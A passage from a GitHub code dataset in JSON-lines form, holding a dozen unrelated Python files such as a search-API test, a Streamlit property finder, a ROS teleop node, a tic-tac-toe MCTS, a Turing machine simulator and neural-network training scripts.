'place=prime&pp=18&entities=product&local-offers-first=0&&rids=54&hid=44&cpa-out-of-stock-models=1'\n + '&rearr-factors=market_disable_out_of_stock_models_search=1&use-default-offers=%s' % do\n )\n response = self.report.request_json(request)\n self.assertFragmentIn(\n response,\n {\"search\": {\"total\": 0, \"totalModels\": 0, \"results\": []}},\n allow_different_len=False,\n )\n\n # Проверяем выдачу моделей не в продаже внутри основной выдачи на прайме\n # Условия теста - см. test_out_of_stock_cpa_model_filter + нужен cpa=real\n # В выдаче должны быть две модели не в продаже + обычные результаты\n def test_out_of_stock_models_on_prime(self):\n \"\"\"Проверяем подмешивание моделей с фильтрацией по отсутствию cpa-офферов в основную выдачу; требуется cpa=only\"\"\"\n request = (\n 'place=prime&pp=18&local-offers-first=0&rids=54&hid=44'\n + '&use-default-offers=1&cpa=real'\n + '&rearr-factors=market_oos_enable=1'\n )\n response = self.report.request_json(request)\n self.assertFragmentIn(\n response,\n {\n \"search\": {\n \"results\": [\n {\"id\": 10, \"entity\": \"product\", \"offers\": {\"count\": 0}},\n {\"id\": 665306170, \"entity\": \"product\", \"offers\": {\"count\": 0}},\n ],\n }\n },\n allow_different_len=True,\n )\n self.assertFragmentIn(\n response,\n {\n \"search\": {\n \"results\": [\n {\"entity\": \"offer\"},\n ],\n }\n },\n allow_different_len=True,\n )\n\n # Проверяем ограничение на количество моделей (не в продаже) в основной выдаче\n # Условия теста - см. test_out_of_stock_cpa_model_filter + нужен cpa=real + нужны схлопывание с разгруппировкой\n # В выдаче должны быть 5 моделей не в продаже (hid=55, hyperid>200) + тестовый схлопнутый cpa-оффер (hid=55, hyperid=200)\n def test_out_of_stock_models_limit_on_prime(self):\n # с how=random используется plain-итератор, без - rearrangeable\n for extra_args in ('', '&how=random'):\n request = (\n 'place=prime&pp=18&local-offers-first=0&rids=54&hid=55'\n + '&use-default-offers=1&cpa=real'\n + '&allow-collapsing=1&allow-ungrouping=1'\n + '&rearr-factors=market_oos_enable=1;market_oos_limit=5;market_oos_limit_per_shard=10'\n + extra_args\n )\n\n response = self.report.request_json(request)\n\n self.assertFragmentIn(\n response,\n {\n \"search\": {\n \"results\": [\n {\"id\": 200, \"entity\": \"product\", \"offers\": {\"count\": 1}},\n ],\n }\n },\n allow_different_len=True,\n )\n\n self.assertFragmentIn(\n response,\n {\n \"search\": {\n \"results\": [\n {\"entity\": \"product\", \"offers\": {\"count\": 0}},\n ]\n * 5,\n }\n },\n allow_different_len=True,\n )\n\n assert len(response.root['search']['results']) == 6\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"market/GENERAL/test_out_of_stock_models.py","file_name":"test_out_of_stock_models.py","file_ext":"py","file_size_in_byte":8845,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"817713489","text":"from typing import List\n\n\nclass Solution:\n def findWords(self, words: List[str]) -> List[str]:\n row1 = set('qwertyuiopQWERTYUIOP')\n row2 = set('asdfghjklASDFGHJKL')\n row3 = set('zxcvbnmZXCVBNM')\n result = []\n for word in words:\n w = set(list(word))\n if w.issubset(row1) or w.issubset(row2) or w.issubset(row3):\n result.append(word)\n return result","repo_name":"ahmaddroobi99/ProblemSolving","sub_path":"keyboradRow.py","file_name":"keyboradRow.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"18410157555","text":"#必要なライブラリをインポート\nimport pandas as pd\nimport streamlit as st\nimport numpy as np\n\n\nst.title('お得な物件を簡単検索!!')\n\nst.text('下記の要素から条件を絞って、物件を抽出しましょう')\nst.text('\"予測値との差\"の値が小さいほど、家賃の相場よりも安いということになります。')\n\nst.header('操作説明')\nst.text('1. \"最低築年数\"の値を決める。\"最高築年数\"の値を決める。')\nst.text('2. 希望の\"間取り\"を選択')\nst.text('3. \"区\"\"、\"市町村\"を選択する')\n\n\n#st.subheader('This is a subheader')\n#st.text('Hello World!,this is text')\n\n# st.write()はMarkdown表記対応\n#st.write('# headline1')\n# 以下のように明示的に書くことも可能\n#st.markdown('## headline2')\n\n#st.write('# 全体の流れ')\nst.text('↓ 東京新宿区の全ての物件')\n\n#DF読み込み\ndf = pd.read_csv('new_geo_df_search.csv')\n\ndf = df.drop(['間取り'],axis=1)\n\n#Streamlitのマジックコマンドst.write()を使用して物件情報を表示\nst.write(df)\n\n#物件の絞り込み機能の追加:\n#Streamlitのウィジェットを使用して、家賃、間取り、専有面積などの絞り込み条件を指定できるようにする。\n\n# 家賃の範囲を指定するスライダー\nage_range = st.slider('築年数の範囲', min_value=0, max_value=int(df['築年数'].max()), value=(0, int(df['築年数'].max())), step=1)\nmin_age = age_range[0]\nmax_age = age_range[1]\n\n\n# 間取りの選択肢\nroom_types = ['DK', 'K', 'L', 'S']\nselected_room_type = st.multiselect('間取り', room_types)\n\n# 区の選択肢\nwards = df['区'].unique()\nselected_wards = st.selectbox('区', wards)\n\n# 市町村の選択肢\ncities = ['すべて選択'] + df['市町村'].unique().tolist()\nselected_cities = st.multiselect('市町村', cities)\n\n# 選択された区,市町村をリストとして扱う\n# isin()を使う際にリストである必要がある。\nselected_wards = [selected_wards] if isinstance(selected_wards, str) else selected_wards\nselected_cities = [selected_cities] if isinstance(selected_cities, str) else selected_cities\n\n\n# 絞り込み条件に基づいて物件をフィルタリング\n#、市町村の選択肢に「すべて選択」が追加され、選択された市町村に基づいて物件を絞り込む処理が行われる。\n# また、選択された市町村が「すべて選択」の場合は、市町村の絞り込み条件を無視して区の条件のみを適用\n\n\nif 'すべて選択' in selected_cities:\n filtered_df = df[\n (df['築年数'] >= min_age) & (df['築年数'] <= max_age) &\n (df['間取りDK'] == (selected_room_type == 'DK')) &\n (df['間取りK'] == (selected_room_type == 'K')) &\n (df['間取りL'] == (selected_room_type == 'L')) &\n (df['間取りS'] == (selected_room_type == 'S')) &\n (df['区'].isin(selected_wards))\n ]\nelse:\n filtered_df = df[\n (df['築年数'] >= min_age) & (df['築年数'] <= max_age) &\n (df['間取りDK'] == (selected_room_type == 'DK')) &\n (df['間取りK'] == (selected_room_type == 'K')) &\n (df['間取りL'] == (selected_room_type == 'L')) &\n (df['間取りS'] == (selected_room_type == 'S')) &\n (df['区'].isin(selected_wards)) &\n (df['市町村'].isin(selected_cities))\n ]\n\n\n \n#st.write('## 物件を出力!!')\n\nst.text('並び順は予測値との差になってます。')\n# 絞り込んだ物件情報の表示\nst.write(filtered_df.sort_values(by='予測値との差',ascending=True))\n\nst.text('マッピング')\n# マッピングのための緯度経度データを作成\n # 緯度経度データを抽出し、欠損値を除外\ndf_map = filtered_df.rename(columns={'緯度': 'latitude', '経度': 'longitude'})[['latitude', 'longitude']].dropna()\n# マップをプロット\nst.map(df_map)\n\n\n\n\nst.header('今後の改良点')\nst.text('1. 全体的なデザイン')\nst.text('2. 列の並び替え')\nst.text('4. 出力された物件情報がもっと直感的にわかりやすいものにしたい')\nst.text('5. 列がonehot-encodingのままなので、整理したい')\nst.text('7. 機械学習をして分析アプリとしての機能も追加したい。')\nst.text('8. 間取りの部分をなんとかする。')\nst.text('9. googlemapにも表示させてやりたい。これに関しては住所がざっくりしてるからgoogleマップの良さが出ない。')\nst.text('10. 物件を選んだら、マップ上で光るようにしたい')\n\n\n","repo_name":"miyazaki-tsubasa/suumo","sub_path":"suumo_code.py","file_name":"suumo_code.py","file_ext":"py","file_size_in_byte":4567,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33644232718","text":"import argparse\nimport os\nfrom pathlib import Path\nimport cv2\nimport numpy as np\nfrom tqdm import tqdm\n\n\ndef parse_bisenet_hair_ratio(path):\n hair_ratio_list = []\n for subdir, dirs, files in os.walk(path):\n print(subdir)\n for filename in tqdm(files):\n #For BiSeNet segmentation there is a color mask version and mask version. Just using the mask!\n if filename.split(\"_\")[-2] != \"color\":\n img = cv2.imread(subdir + os.sep + filename, cv2.IMREAD_GRAYSCALE)\n\n # 17 is the hair region\n img[img!=17] = 0\n img[img== 17] = 1\n\n hair_area = len(img[img == 1])\n total_area = img.shape[0] * img.shape[1]\n\n per_skin = round(hair_area/total_area *100,2)\n\n filename = filename.replace(\"_mask.png\", \".JPG\")\n\n hair_ratio_list.append([filename,per_skin])\n\n return hair_ratio_list\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Get the hair ratio for all images given the path to BiSeNet segmentation mask\")\n parser.add_argument(\"--source\", \"-s\", required = True, help=\"Path to source directory of BiseNet. Make sure this is for each group - each separate for C_M,C_F and so on\")\n parser.add_argument(\"--destination\", \"-d\", required = True, help=\"path to save txt file\")\n parser.add_argument(\"--name\", \"-n\", required = True, help=\"Name to save the file.\")\n args = parser.parse_args()\n\n hair_ratio_list = parse_bisenet_hair_ratio(args.source)\n\n if not os.path.exists(args.destination):\n os.makedirs(args.destination)\n \n save_name = os.path.join(args.destination,args.name)\n\n np.savetxt(\"{}.txt\".format(save_name), hair_ratio_list, fmt='%s', delimiter=' ', newline='\\n')","repo_name":"abhatta1234/codesForPapers_PhD_NotreDame","sub_path":"Hair-Dimension-Balancing_ArXiv_2021/prelims/bisenet_parsing.py","file_name":"bisenet_parsing.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35367468236","text":"#!/usr/bin/env python\nimport rospy\nfrom geometry_msgs.msg import Twist # import Twist message\n\ndef multiplier_msg(data,self):\n self.distance_multiplier = data.linear.y # set linear multiplier\n self.angle_multiplier = data.angular.y # set angular multiplier\n\ndef turtle_msg(data, self):\n self.x = data.linear.x # set linear component\n self.z = data.angular.z # set angular component\n\n dist = 75*self.distance_multiplier # set a distance offset\n ang = 25*self.angle_multiplier # set the angle offest\n\n # retrieve the target parameters\n self.distance = rospy.get_param(\"distance/target\")\n self.angle = rospy.get_param(\"angle/target\")\n\n if self.x > 0:\n # move forward\n self.distance = self.distance + dist\n elif self.x < 0:\n # move backward\n self.distance = self.distance - dist\n elif self.z > 0:\n # turn left\n self.angle = self.angle + ang\n elif self.z < 0:\n # turn right\n self.angle = self.angle - ang\n else:\n rospy.loginfo(\"Parse error\")\n\n # set the target parameters\n rospy.set_param(\"distance/target\",self.distance)\n rospy.set_param(\"angle/target\",self.angle)\n\nclass TheNode(object):\n # This class holds the rospy logic for updating the PID targets\n # from a published teleop_turtle_key message or keyboard input\n\n def __init__(self):\n\n rospy.init_node('pid_remote_drive') # intialize node\n\n self.x = 0 # linear component variable\n self.z = 0 # angular component variable\n\n self.distance = 0 # distance variable\n self.angle = 0 # angle variable\n\n self.angle_multiplier = 1 # angle multiplier variable\n self.distance_multiplier = 1 # distance multiplier variable\n\n def main_loop(self):\n # initialize subscriber node for messages from teleop_turtle_key\n rospy.Subscriber('/turtle1/cmd_vel', Twist, turtle_msg, self)\n rospy.Subscriber('/key_input', Twist, multiplier_msg, self)\n\n rospy.spin() # wait for messages\n\nif __name__ == '__main__':\n try:\n a = TheNode()\n a.main_loop()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"dacools/lab2","sub_path":"scripts/pid_remote_drive.py","file_name":"pid_remote_drive.py","file_ext":"py","file_size_in_byte":2148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38073255754","text":"#NN test file\n#####################################################################\n#Importing Packages\nimport numpy as np\nimport pandas as pd\nimport pyarrow as pa\nimport pyarrow.parquet as pq\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout\nfrom keras.callbacks import ModelCheckpoint\nimport keras as keras\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA\nfrom sklearn.utils import shuffle\n\n\n\n######################################################################\n#Reading in the features and making a Train/test split\npq_X_train = pq.read_table('Feature_train.parquet')\npq_y_train = pq.read_table('Stress_train.parquet')\n\npq_X_test = pq.read_table('Feature_test.parquet')\npq_y_test = pq.read_table('Stress_test.parquet')\n\nX_train= pq_X_train.to_pandas()\ny_train= pq_y_train.to_pandas()\nX_test= pq_X_test.to_pandas()\ny_test= pq_y_test.to_pandas()\n\nprint(X_train.shape, y_train.shape)\nprint(X_test.shape, y_test.shape)\ny_train=y_train.to_numpy()\ny_test=y_test.to_numpy()\ny_train=y_train.ravel()\ny_test=y_test.ravel()\n\n# ########################################################################\nLDA\nlda=LDA(n_components=1)\ntrain_lda=lda.fit(X_train, y_train)\ntest_lda=lda.predict(X_test)\n\n# print(test_lda.shape)\n# print(y_test.shape)\n\n#######################################################################\n# Neural Network\n\n# Best Batchsize= 16\n# Best Hidden layer nodes= approx 16,32,32\n# Best droppout= 0.19\n# Best optimizer = Nadam\n# Best loss = \"binary_crossentropy\"\n\nfor j in range (10):\n print(j)\n dropoutje=0.1*j\n\n input_nodes = X_train.shape[1]\n hidden_layer_1_nodes = 16\n hidden_layer_2_nodes = 32\n hidden_layer_3_nodes = 32\n output_layer = 1\n\n # initializing a sequential model\n full_model = Sequential()\n\n # adding layers\n full_model.add(Dense(hidden_layer_1_nodes,input_dim=input_nodes , activation='relu'))\n #full_model.add(Dropout(dropoutje))\n full_model.add(Dense(hidden_layer_2_nodes, activation='relu'))\n #full_model.add(Dropout(dropoutje))\n full_model.add(Dense(hidden_layer_3_nodes, activation='relu'))\n #full_model.add(Dropout(dropoutje))\n full_model.add(Dense(output_layer, activation='sigmoid'))\n\n #full_model.summary()\n\n # Compiling the DNN\n full_model.compile(optimizer=\"Nadam\", loss=\"binary_crossentropy\", metrics=['accuracy'])\n\n history = full_model.fit(X_train,y_train,validation_data=(X_test,y_test), epochs=512, batch_size=(16), verbose=0)\t\n\n req1=np.mean(history.history['val_accuracy'])>=np.mean(history.history['accuracy'])\n req2=np.max(history.history['val_accuracy'])>=np.max(history.history['accuracy'])\n print(\"Val:\",np.max(history.history['val_accuracy']), \"Acc\", np.max(history.history['accuracy']))\n #req3=np.max(history.history['val_accuracy'])>0.96\n if (req1==True and req2==True): # (req1==True and req2==True): and \n print(\"This is the accuracy:\", np.max(history.history['accuracy']))\n full_model.save(f\"New best NN {j}\")\n plt.figure()\n plt.plot(history.history['accuracy'], label = f\"training{j}\")\n plt.plot(history.history['val_accuracy'], label = f\"test{j}\")\n print(\"This is the validation, not overfitted:\", np.max(history.history['val_accuracy']))\n plt.legend()\n\n\n# new_model = keras.models.load_model('Best NN 8')\n# new_model.summary()\n# # Evaluate the restored model\n# loss, acc = new_model.evaluate(X_test, y_test, verbose=2)\n# print('Restored model, accuracy: {:5.2f}%'.format(100 * acc))\n","repo_name":"thomasritmeester/EPO-4_BioBombs","sub_path":"Machine learning/NN test file.py","file_name":"NN test file.py","file_ext":"py","file_size_in_byte":3664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5129199847","text":"import random\nimport math\n\nC = 1.4\n\ndef ucb_score(node, parent_visits, exploration_constant):\n if node.visits == 0:\n return float('inf')\n exploitation_term = node.wins / node.visits\n exploration_term = math.sqrt(math.log(parent_visits) / node.visits)\n return exploitation_term + exploration_constant * exploration_term\n\nclass Node: \n def __init__(self, state, parent=None, position=None):\n self.state = state\n self.parent = parent\n self.children = []\n self.position = position\n self.visits = 0\n self.wins = 0\n\n def select(self):\n ucb_scores = [ucb_score(child, self.visits, C) for child in self.children]\n max_ucb = max(ucb_scores)\n max_indices = [i for i in range(len(ucb_scores)) if ucb_scores[i] == max_ucb]\n return self.children[random.choice(max_indices)]\n\n def expand(self):\n for move in self.state.get_possible_moves():\n copy = self.state.copy()\n copy.make_move(move)\n child = Node(copy, self, move)\n self.children.append(child)\n\n def update(self, result):\n self.visits += 1\n self.wins += result\n if self.parent:\n self.parent.update(result)\n \n\nclass TicTacToe:\n def __init__(self):\n self.board = [['-' for _ in range(3)] for _ in range(3)]\n self.current_player = 'X'\n\n def copy(self):\n copy_game = TicTacToe()\n copy_game.board = [row[:] for row in self.board]\n copy_game.current_player = self.current_player\n return copy_game\n\n def get_possible_moves(self):\n moves = []\n for row in range(3):\n for col in range(3):\n if self.board[row][col] == '-':\n moves.append((row, col))\n return moves\n\n def make_move(self, move):\n row, col = move\n self.board[row][col] = self.current_player\n self.current_player = 'O' if self.current_player == 'X' else 'X'\n\n def is_win(self, player):\n if any(all(self.board[row][col] == player for col in range(3)) for row in range(3)):\n return True\n if any(all(self.board[row][col] == player for row in range(3)) for col in range(3)):\n return True\n if all(self.board[i][i] == player for i in range(3)):\n return True\n if all(self.board[i][2-i] == player for i in range(3)):\n return True\n return False\n\n def is_draw(self):\n for row in range(3):\n for col in range(3):\n if self.board[row][col] == '-':\n return False\n return True\n\n def is_terminal(self):\n return self.is_win('X') or self.is_win('O') or self.is_draw()\n\n def get_winner(self):\n if self.is_win('X'):\n return 'X'\n elif self.is_win('O'):\n return 'O'\n else:\n return None\n\n def print_board(self):\n print(\" 0 1 2\")\n for i in range(3):\n row_str = f\"{i} \"\n for j in range(3):\n row_str += f\"{self.board[i][j]} \"\n print(row_str) \ndef simulate_game(game, debug=False):\n while not game.is_terminal():\n game.make_move(random.choice(game.get_possible_moves()))\n winner = game.get_winner()\n if winner == 'X':\n return -1\n elif winner == 'O':\n return 1\n return 0\n\ndef print_tree(node, depth=0):\n if node is None:\n return\n indent = ' ' * depth\n print(f\"{indent} {node.position}\")\n print(f\"{indent} v:{node.visits} w:{node.wins}\")\n for child in node.children:\n print_tree(child, depth + 2)\n\ndef monte_carlo_tree_search(game, num_iterations, debug=False):\n \"\"\"\n Performs Monte Carlo Tree Search from the given node for a certain number of iterations.\n\n :param node: The root node of the tree to search.\n :param num_simulations: The number of simulations to run.\n :return: The best move found by the search.\n \"\"\"\n root = Node(game)\n for _ in range(num_iterations):\n node = root\n while node.children:\n # Selection: Choose a child node to explore using UCB scores\n node = node.select()\n if not node.visits:\n # Expansion: Expand the selected node by adding a new child node\n node.expand()\n\n # Simulation: Simulate a game from the new child node\n result = simulate_game(node.state.copy(), debug=debug)\n\n # Backpropagation: Update the tree statistics from the simulation result\n node.update(result)\n \n if debug:\n print_tree(root)\n bestNode = max(root.children, key=lambda node: node.visits)\n return bestNode.position\n\ngame = TicTacToe()\n\n\nprint(\"--------------------\")\nprint(\"TIK TAK TOE\")\nprint(\"--------------------\")\ngame.print_board()\n\nwhile not game.is_terminal():\n if game.current_player == 'X':\n xy = input(\"Enter row and column as x,y: \").split(',')\n if len(xy) == 2 and xy[0].isdigit() and xy[1].isdigit():\n row, col = int(xy[0]), int(xy[1])\n game.make_move((row, col))\n else:\n raise RuntimeError(\"Invalid input\")\n else:\n move = monte_carlo_tree_search(game, 100, False)\n game.make_move(move)\n\n game.print_board()\n print(\"\\n\")\n\nwinner = game.get_winner()\nif winner:\n print(f\"{winner} wins!\")\nelse:\n print(\"It's a draw!\")","repo_name":"stevenandersonz/ai-stuff","sub_path":"mcts/mcts.py","file_name":"mcts.py","file_ext":"py","file_size_in_byte":5397,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"36406738978","text":"#\n# @lc app=leetcode.cn id=1805 lang=python3\n#\n# [1805] 字符串中不同整数的数目\n#\n\n# @lc code=start\nclass Solution:\n def numDifferentIntegers(self, word: str) -> int:\n x = \"\"\n res = set()\n for o in word:\n if '0' <= o <= '9':\n x += o\n else:\n if x:\n res.add(int(x))\n x = \"\"\n if x:\n res.add(int(x))\n return len(res)\n# @lc code=end\n\n","repo_name":"yarzzz/leetcode_python3","sub_path":"1805.字符串中不同整数的数目.py","file_name":"1805.字符串中不同整数的数目.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37676340969","text":"from influxdb import InfluxDBClient\nclient = InfluxDBClient(host='localhost', port=8086)\nclient.create_database('pyexample')\nclient.get_list_database()\nclient.switch_database('pyexample')\n\njson_body = [\n {\n \"measurement\": \"brushEvents\",\n \"tags\": {\n \"user\": \"Carol\",\n \"brushId\": \"6c89f539-71c6-490d-a28d-6c5d84c0ee2f\"\n },\n \"time\": \"2018-03-28T8:01:00Z\",\n \"fields\": {\n \"duration\": 127\n }\n },\n {\n \"measurement\": \"brushEvents\",\n \"tags\": {\n \"user\": \"Carol\",\n \"brushId\": \"6c89f539-71c6-490d-a28d-6c5d84c0ee2f\"\n },\n \"time\": \"2018-03-29T8:04:00Z\",\n \"fields\": {\n \"duration\": 132\n }\n },\n {\n \"measurement\": \"brushEvents\",\n \"tags\": {\n \"user\": \"Carol\",\n \"brushId\": \"6c89f539-71c6-490d-a28d-6c5d84c0ee2f\"\n },\n \"time\": \"2018-03-30T8:02:00Z\",\n \"fields\": {\n \"duration\": 129\n }\n }\n]\n\n\nclient.write_points(json_body)\n\nclient.query('SELECT \"duration\" FROM \"pyexample\".\"autogen\".\"brushEvents\" WHERE time > now() - 4d GROUP BY \"user\"')","repo_name":"Microshak/MicroNotes","sub_path":"Databases/Influx/influx.py","file_name":"influx.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"73350607273","text":"import time\n\ndef fib(n):\n starting_time = time.time() \n fi = [0] * (n+1) \n fi[1] = 1\n for i in range (2,n+1): \n fi[i] = fi[i-1] + fi[i-2] \n end_time = time.time() \n executiontime = end_time - starting_time\n return fi[n], executiontime\n\nn = int(input(\"Input an integer from 15 to 35: \"))\nfibvalue,_ = fib(n)\n_,executiontime = fib(n)\nprint(f\"fib({n})=\",fibvalue, end='\\n')\nprint(f\"fib({n}) took\",executiontime, \"seconds\")\n\n","repo_name":"ITSC-3155-Spring23-MMejias/intermediate-python-exercises-2-mitchelln02","sub_path":"exercise_02/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17897483820","text":"import os\nimport time\n\nimport pytest\nfrom gi.repository import Gtk\n\n\n@pytest.fixture\ndef session(mocker):\n from tomate.session import Session\n\n return mocker.Mock(Session)\n\n\n@pytest.fixture\ndef graph():\n from tomate.graph import graph\n\n graph.providers.clear()\n\n return graph\n\n\n@pytest.fixture\ndef config(mocker):\n from tomate.config import Config\n\n parent_directory = os.path.dirname(os.path.dirname(__file__))\n icon_path = os.path.join(\n parent_directory, \"data/icons/hicolor/16x16/apps/tomate-plugin.png\"\n )\n instance = mocker.Mock(\n Config,\n SECTION_SHORTCUTS=Config.SECTION_SHORTCUTS,\n SECTION_TIMER=Config.SECTION_TIMER,\n **{\"get_int.return_value\": 25, \"get_icon_path.return_value\": icon_path}\n )\n\n return instance\n\n\n@pytest.fixture\ndef plugin_manager(mocker):\n return mocker.Mock()\n\n\n@pytest.fixture\ndef lazy_proxy(mocker):\n from tomate.proxy import lazy_proxy\n\n return mocker.Mock(lazy_proxy)\n\n\ndef refresh_gui(delay=0):\n while Gtk.events_pending():\n Gtk.main_iteration_do(False)\n time.sleep(delay)\n","repo_name":"proganalysis/python3_types","sub_path":"Result/4079files/source/1370.py","file_name":"1370.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"42243925997","text":"from datetime import datetime\nimport time\n\n\nclass TuringMachine:\n\n def checkInstruction(self, currentState, currentChar):\n for it in self.data.instructions[currentState]:\n if it.currentChar == currentChar:\n return it\n\n def printPointer(self, number, state, instruction):\n result = \"\"\n for i in range(number):\n result += \" \"\n result += \"|\"\n tmp = \"Stan: \" + str(state)\n result += tmp.center(10)\n result += str(instruction)\n self.lines.append(result)\n print(result)\n\n def currentWord(self, word):\n tmp = []\n for it in word:\n tmp.append(it)\n return \"\".join(tmp)\n\n def changeChar(self, word, index, newChar):\n tmp = []\n for i in range(len(word)):\n if i == index:\n tmp.append(newChar)\n else:\n tmp.append(word[i])\n return \"\".join(tmp)\n\n def printWord(self, word):\n print(\"___\" + word + \"___\")\n self.lines.append(\"___\" + word + \"___\" + \"\\n\")\n\n def saveToFile(self):\n file = open(\"resultOfSimulationMT.txt\", \"a\")\n now = datetime.now()\n file.write(\"-------------------------------------------------\".center(50))\n file.write(\"\\nData uruchomienia symulatora: \" + now.strftime(\"%d/%m/%Y %H:%M:%S\" + \"\\n\\n\"))\n file.write(\"Słowo początkowe: \" + self.data.word + \"\\n\")\n for it in self.lines:\n file.write(it + \"\\n\")\n file.write(\"-------------------------------------------------\".center(50))\n file.close()\n print(\"Wynik działania symulatora został zapisany do pliku resultOfSimulationMT.txt\")\n\n def run(self, data):\n start = time.time()\n self.lines = []\n self.data = data\n self.lines.append(self.data.description + \"\\n\")\n print(self.data.description)\n word = self.currentWord(self.data.word)\n\n currentState = int(self.data.initialState)\n i = 0\n while True:\n if self.data.word[i] == '_':\n i += 1\n else:\n break\n counter = 0\n while True:\n counter += 1\n if counter > (len(self.data.word) * 1000):\n print(\"Maszyna prawdopodobnie została zapętlona w instrukcji '\" + str(instruction) + \"' i niespodziewanie zakończyła swoją pracę.\")\n self.lines.append(\"Maszyna prawdopodobnie została zapętlona i niespodziewanie zakończyła swoją pracę.\")\n return\n\n if i >= len(word) or i < 0:\n instruction = self.checkInstruction(currentState, '_')\n else:\n if word[i] not in self.data.alphabet:\n print(\"Maszyna napotkała znak spoza podanego alfabetu i nieoczekiwanie zakończyła swoją pracę.\")\n self.lines.append(\"Maszyna napotkała znak spoza podanego alfabetu i nieoczekiwanie zakończyła swoją pracę.\")\n return\n instruction = self.checkInstruction(currentState, word[i])\n self.printPointer(i + 3, currentState, instruction)\n\n self.printWord(word)\n\n word = self.changeChar(word, i, instruction.newChar)\n if instruction.move == 'l':\n currentState = int(instruction.nextState)\n i -= 1\n elif instruction.move == \"s\":\n self.printPointer(i + 3, instruction.nextState, instruction)\n self.printWord(word)\n print(\"Symulator kończy pracę w stanie: \" + instruction.nextState)\n self.lines.append(\"Symulator kończy pracę w stanie: \" + instruction.nextState)\n break\n elif instruction.move == \"r\":\n i += 1\n currentState = int(instruction.nextState)\n\n diff = time.time() - start\n tmp = \"_\"\n for it in word:\n if it != \"_\":\n tmp += it\n tmp += \"_\"\n print(\"Koniec działania symulatora.\")\n print(\"Słowo po zakończeniu pracy symulatora: \" + tmp)\n print(\"\\nPodsumowanie:\")\n print(\"\\tLiczba kroków wykonanych przez symulator: \" + str(counter))\n print(\"\\tCzas wykonania programu: \" + \"{:.4f}\".format(diff))\n\n self.lines.append(\"Słowo po zakończeniu pracy symulatora: \" + tmp)\n self.lines.append(\"Koniec działania symulatora.\")\n self.lines.append(\"\\nPodsumowanie:\")\n self.lines.append(\"\\tLiczba kroków wykonanych przez symulator: \" + str(counter))\n self.lines.append(\"\\tCzas wykonania programu: \" + \"{:.4f}\".format(diff))\n self.saveToFile()\n","repo_name":"MateuszKopczan/TuringMachineSimulator","sub_path":"TuringMachine.py","file_name":"TuringMachine.py","file_ext":"py","file_size_in_byte":4679,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37821630647","text":"import argparse\nimport getpass\nimport random\nimport time\nimport warnings\nfrom argparse import ArgumentParser\nfrom typing import Type\n\nimport pytorch_lightning as pl\nfrom pytorch_lightning.callbacks import ModelCheckpoint\nfrom pytorch_lightning.loggers import (\n LightningLoggerBase,\n MLFlowLogger,\n TensorBoardLogger,\n)\n\nfrom deep_memory_update.data import BaseDataModule\nfrom deep_memory_update.models import BaseModel\nfrom deep_memory_update.models.utils import ThresholdedEarlyStopping\n\nwarnings.filterwarnings(\n \"ignore\",\n message=\"Your `IterableDataset` has `__len__` defined\",\n category=UserWarning,\n)\nwarnings.filterwarnings(\n \"ignore\",\n message=r\"The dataloader, (.*?) does not have many workers\",\n category=UserWarning,\n)\n\n\nclass Experiment:\n def __init__(\n self,\n model: Type[BaseModel],\n data_module: Type[BaseDataModule],\n parser_default: dict = None,\n ):\n self.model = model\n self.data_module = data_module\n self.early_stopping = ThresholdedEarlyStopping\n self.parser_default = parser_default if parser_default is not None else {}\n\n def run(self):\n parser = self.create_parser()\n args = parser.parse_args()\n\n if args.seed is not None:\n pl.seed_everything(args.seed)\n\n if args.fast_dev_run:\n args.batch_size_val = args.batch_size\n args.batch_size_test = args.batch_size\n\n if args.distributed_backend == \"ddp\":\n # When using a single GPU per process and per\n # DistributedDataParallel, we need to divide the batch size\n # ourselves based on the total number of GPUs we have\n args.batch_size = int(args.batch_size / max(1, args.gpus))\n args.workers = int(args.workers / max(1, args.gpus))\n\n data_module = self.data_module(**vars(args))\n model = self.model(\n **vars(args),\n input_size=data_module.input_size(),\n output_size=data_module.output_size(),\n loss_weight=data_module.loss_weight(),\n pad_sequence=data_module.pad_sequence,\n )\n early_stopping = self.early_stopping(**vars(args))\n\n logger = self.create_logger(logger_name=args.logger_name)\n trainer = pl.Trainer.from_argparse_args(args, logger=logger)\n if args.checkpoint_monitor:\n checkpoint_callback = ModelCheckpoint(\n monitor=args.checkpoint_monitor,\n save_top_k=args.checkpoint_top_k,\n mode=args.checkpoint_mode,\n )\n trainer.callbacks.append(checkpoint_callback)\n\n if args.thresholded_early_stopping:\n trainer.callbacks.append(early_stopping)\n trainer.logger.log_hyperparams(args)\n\n start = time.time()\n trainer.fit(model, datamodule=data_module)\n end = time.time()\n\n if not args.no_evaluate:\n if args.checkpoint_monitor:\n trainer.test(ckpt_path=checkpoint_callback.best_model_path)\n else:\n trainer.test(ckpt_path=\"best\")\n\n 